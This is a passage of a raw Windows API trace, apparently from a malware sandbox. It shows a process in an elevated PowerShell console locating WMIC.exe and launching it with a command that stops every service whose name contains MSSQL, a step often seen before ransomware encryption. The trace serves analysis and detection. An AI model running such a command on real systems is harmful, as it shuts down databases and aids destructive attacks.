lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.241] SetErrorMode (uMode=0x1) returned 0x1 [0240.241] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.241] SetErrorMode (uMode=0x1) returned 0x1 [0240.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.241] SetErrorMode (uMode=0x1) returned 0x1 [0240.242] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.242] SetErrorMode (uMode=0x1) returned 0x1 [0240.242] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.242] SetErrorMode (uMode=0x1) returned 0x1 [0240.242] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.242] SetErrorMode (uMode=0x1) returned 0x1 [0240.243] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.243] SetErrorMode (uMode=0x1) returned 0x1 [0240.243] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.243] SetErrorMode (uMode=0x1) returned 0x1 [0240.243] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.243] SetErrorMode (uMode=0x1) returned 0x1 [0240.244] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.244] SetErrorMode (uMode=0x1) returned 0x1 [0240.244] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.244] SetErrorMode (uMode=0x1) returned 0x1 [0240.244] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.245] SetErrorMode (uMode=0x1) returned 0x1 [0240.245] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.245] SetErrorMode (uMode=0x1) returned 0x1 [0240.245] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.245] SetErrorMode (uMode=0x1) returned 0x1 [0240.245] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.246] SetErrorMode (uMode=0x1) returned 0x1 [0240.246] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.246] SetErrorMode (uMode=0x1) returned 0x1 [0240.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0240.246] SetErrorMode (uMode=0x1) returned 0x1 [0240.246] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.247] SetErrorMode (uMode=0x1) returned 0x1 [0240.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0240.247] SetErrorMode (uMode=0x1) returned 0x1 [0240.247] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.247] SetErrorMode (uMode=0x1) returned 0x1 [0240.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0240.248] SetErrorMode (uMode=0x1) returned 0x1 [0240.248] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.248] SetErrorMode (uMode=0x1) returned 0x1 [0240.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0240.249] SetErrorMode (uMode=0x1) returned 0x1 [0240.249] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.249] SetErrorMode (uMode=0x1) returned 0x1 [0240.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0240.249] SetErrorMode (uMode=0x1) returned 0x1 [0240.249] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0240.250] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c90d850 | out: lpFindFileData=0x1c90d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0240.250] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0240.250] SetErrorMode (uMode=0x1) returned 0x1 [0240.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c90d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0240.251] SetErrorMode (uMode=0x1) returned 0x1 [0240.251] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c90db70 | out: lpFileInformation=0x1c90db70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0240.251] SetErrorMode (uMode=0x1) returned 0x1 [0240.252] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0240.252] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c90dd58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c90dd58) returned 0x4550 [0240.253] CoTaskMemFree (pv=0x1b9b1010) [0240.253] GetConsoleWindow () returned 0x5011e [0240.253] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.253] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.254] CoTaskMemFree (pv=0x2af7b0) [0240.254] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.254] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.254] CoTaskMemFree (pv=0x2af7b0) [0240.254] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", pNumArgs=0x1c90dda0 | out: pNumArgs=0x1c90dda0) returned 0x1ee760*="" [0240.254] lstrlenW (lpString="path") returned 4 [0240.254] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc8f0 [0240.254] RtlMoveMemory (in: Destination=0x1b9cc8f0, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9cc8f0) [0240.254] CoTaskMemFree (pv=0x1b9cc8f0) [0240.254] lstrlenW (lpString="Win32_Service") returned 13 [0240.254] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0240.254] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0240.254] CoTaskMemFree (pv=0x1b9b1010) [0240.254] lstrlenW (lpString="where") returned 5 [0240.254] CoTaskMemAlloc (cb=0xe) returned 0x1b9cc8f0 [0240.254] RtlMoveMemory (in: Destination=0x1b9cc8f0, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9cc8f0) [0240.254] CoTaskMemFree (pv=0x1b9cc8f0) [0240.255] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0240.255] CoTaskMemAlloc (cb=0x2e) returned 0x1b9c7170 [0240.255] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x2c | out: Destination=0x1b9c7170) [0240.255] CoTaskMemFree (pv=0x1b9c7170) [0240.255] lstrlenW (lpString="call") returned 4 [0240.255] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc8f0 [0240.255] RtlMoveMemory (in: Destination=0x1b9cc8f0, Source=0x1ee800, Length=0xa | out: Destination=0x1b9cc8f0) [0240.255] CoTaskMemFree (pv=0x1b9cc8f0) [0240.255] lstrlenW (lpString="stopservice") returned 11 [0240.255] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0240.255] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee80a, Length=0x18 | out: Destination=0x1b9b1010) [0240.255] CoTaskMemFree (pv=0x1b9b1010) [0240.255] LocalFree (hMem=0x1ee760) returned 0x0 [0240.255] CoTaskMemAlloc (cb=0x804) returned 0x1b9dc080 [0240.255] GetConsoleTitleW (in: lpConsoleTitle=0x1b9dc080, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0240.256] CoTaskMemFree (pv=0x1b9dc080) [0240.256] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0240.256] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c90dd00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30c07a0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessInformation=0x30c07a0*(hProcess=0x4b4, hThread=0x4b0, dwProcessId=0xb30, dwThreadId=0xb2c)) returned 1 [0240.260] CoTaskMemFree (pv=0x253f20) [0240.260] CloseHandle (hObject=0x4b0) returned 1 [0240.260] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0240.260] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c90dda8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c90dda8) returned 0x4550 [0240.261] CoTaskMemFree (pv=0x1b9b1010) [0240.261] GetCurrentProcess () returned 0xffffffffffffffff [0240.261] GetCurrentProcess () returned 0xffffffffffffffff [0240.261] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c90de88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c90de88*=0x4b0) returned 1 [0242.716] CloseHandle (hObject=0x4b0) returned 1 [0242.716] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x1c90def8 | out: lpExitCode=0x1c90def8*=0x0) returned 1 [0242.717] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0242.718] CloseHandle (hObject=0x4b4) returned 1 [0242.718] SetEvent (hEvent=0x480) returned 1 [0242.718] SetEvent (hEvent=0x474) returned 1 [0242.718] SetEvent (hEvent=0x478) returned 1 [0242.718] SetEvent (hEvent=0x47c) returned 1 [0242.719] SetEvent (hEvent=0x490) returned 1 [0242.719] SetEvent (hEvent=0x484) returned 1 [0242.719] SetEvent (hEvent=0x488) returned 1 [0242.719] SetEvent (hEvent=0x48c) returned 1 [0242.719] SetEvent (hEvent=0x494) returned 1 [0242.719] CoUninitialize () Thread: id = 145 os_tid = 0x494 [0242.752] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0242.754] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0242.755] VirtualQuery (in: lpAddress=0x1c9cd900, lpBuffer=0x1c9ce7c0, dwLength=0x30 | out: lpBuffer=0x1c9ce7c0*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0242.757] VirtualQuery (in: lpAddress=0x1c9cdbb0, lpBuffer=0x1c9cea70, dwLength=0x30 | out: lpBuffer=0x1c9cea70*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0242.762] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0242.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.762] CoTaskMemFree (pv=0x2af7b0) [0242.762] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0242.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0242.763] CoTaskMemFree (pv=0x2af7b0) [0242.763] CoTaskMemAlloc (cb=0x20e) returned 0x2bb520 [0242.763] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bb520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0242.763] CoTaskMemFree (pv=0x2bb520) [0242.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.764] SetErrorMode (uMode=0x1) returned 0x1 [0242.764] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.765] SetErrorMode (uMode=0x1) returned 0x1 [0242.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.765] SetErrorMode (uMode=0x1) returned 0x1 [0242.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.766] SetErrorMode (uMode=0x1) returned 0x1 [0242.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.766] SetErrorMode (uMode=0x1) returned 0x1 [0242.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.766] SetErrorMode (uMode=0x1) returned 0x1 [0242.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.767] SetErrorMode (uMode=0x1) returned 0x1 [0242.767] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.768] SetErrorMode (uMode=0x1) returned 0x1 [0242.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.769] SetErrorMode (uMode=0x1) returned 0x1 [0242.769] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.769] SetErrorMode (uMode=0x1) returned 0x1 [0242.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.769] SetErrorMode (uMode=0x1) returned 0x1 [0242.769] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.770] SetErrorMode (uMode=0x1) returned 0x1 [0242.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.770] SetErrorMode (uMode=0x1) returned 0x1 [0242.770] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.770] SetErrorMode (uMode=0x1) returned 0x1 [0242.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.771] SetErrorMode 